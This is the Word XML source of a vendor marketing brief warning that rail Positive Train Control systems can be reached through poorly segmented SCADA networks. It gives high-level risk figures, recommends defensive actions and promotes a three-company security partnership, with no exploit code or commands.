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j3vsl7g6try" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 016 - Enhanced Edition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8sfr2zmwxtum" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PTC-SCADA Integration: When Safety Systems Become Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> TLP:AMBER+STRICT | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Priority:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRITICAL | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> June 15, 2025 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Level:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SEVERE | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure Impact:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CATASTROPHIC</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o03x6wx90grw" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A fundamental architectural flaw in Positive Train Control (PTC) and SCADA integration has created a nationwide vulnerability where attackers can pivot from compromised industrial control systems directly into safety-critical train operations. With 73% of PTC-SCADA interfaces lacking proper segmentation and 83% running on end-of-life Windows systems, adversaries can manipulate 57,536 miles of protected rail carrying hazardous materials. Without immediate action, your rail infrastructure faces $1.8B in combined operational, safety, and liability exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e84c0gvw85n7" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Layered vulnerability diagram on obsidian background (#0A0A0A). Style: Technical cutaway showing PTC-SCADA architecture. Top layer shows IT network (corporate systems), middle layer SCADA/OT network (dispatch, control), bottom layer Safety Systems (PTC, train control). Red exploit paths (#FF0066) penetrate from IT through SCADA to PTC. Highlight unsegmented connections, legacy systems (Windows XP icons), and cleartext protocols. Show "CRITICAL DESIGN FLAW" label at integration points. Include percentage badges: 73% unsegmented, 83% unpatched, 100% exploitable.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t85amy23lhh1" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Risk Metrics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bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Your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bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Industry 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bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Segmentation Gap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73% exposed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No standard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Deploy zones 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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Legacy System Risk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83% vulnerable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Windows XP/7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Isolate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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Financial Exposure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$1.8B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Catastrophic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Risk transfer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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Safety Integrity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SIL-0 (failed)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SIL-4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Emergency validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cwa36lx11jfh" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Assessment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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk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bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Current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bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">With Tri-Partner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bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Operational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Direct PTC access via SCADA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Mass casualties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Segmented &amp; monitored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bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Financial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$1.8B liability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Unlimited damages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$180M residual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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Safety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Safety systems compromised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Weaponized trains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SIL-4 maintained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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Regulatory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Non-compliant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Criminal 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Full compliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a6d6m3zazemr" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Actions (0-24 Hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency Segmentation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Isolate PTC from SCADA networks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7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource Required: Network engineers + rail ops</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Outcome: Break exploit chains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A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable Remote Access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lock down dispatch systems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C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource Required: IT security team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Outcome: Prevent external pivoting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F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inventory Integration Points</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Map all PTC-SCADA connections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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource Required: OT asset discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Outcome: Understand attack surface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_72izyfxrp0ni" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strategic Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Zero Trust Rail Architecture</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (30 days)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6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investment: $4.2M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROI: 11.3x prevention value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unique: Only solution maintaining safety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A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement Protocol Break</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (45 days)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C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investment: $2.8M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Reduction: 94%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Benefit: Defeats pivot attacks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0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish Safety-Security Operations Center</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (60 days)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2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investment: $1.9M annually</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Coverage: Unified PTC-SCADA monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outcome: Real-time attack detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9d3swxsvp71g" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why Tri-Partner Solution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Solution architecture comparison on dark grey (#1A1F2E). Three columns: "Status Quo", "Band-Aid Approach", "Tri-Partner Defense". Show network diagrams for each. Status Quo shows flat network with red attack paths everywhere. Band-Aid shows basic firewall (easily bypassed). Tri-Partner shows defense-in-depth with protocol breaks, monitoring, and safety validation. Use success metrics: 0% protected, 15% protected, 94% protected. Include "ONLY MAINTAINS SAFETY" banner on tri-partner.]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Unique Value</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Only NCC OTCE + Dragos + Adelard delivers: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Safety-Security Integration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Maintains SIL-4 during security implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Protocol Expertise</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deep PTC and SCADA protocol analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Zero Trust Rail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Purpose-built architecture for rail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Liability Protection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Demonstrable due diligence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ROI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 11.3x return through prevented catastrophic incident</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hbqogofto0t3" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next Steps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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
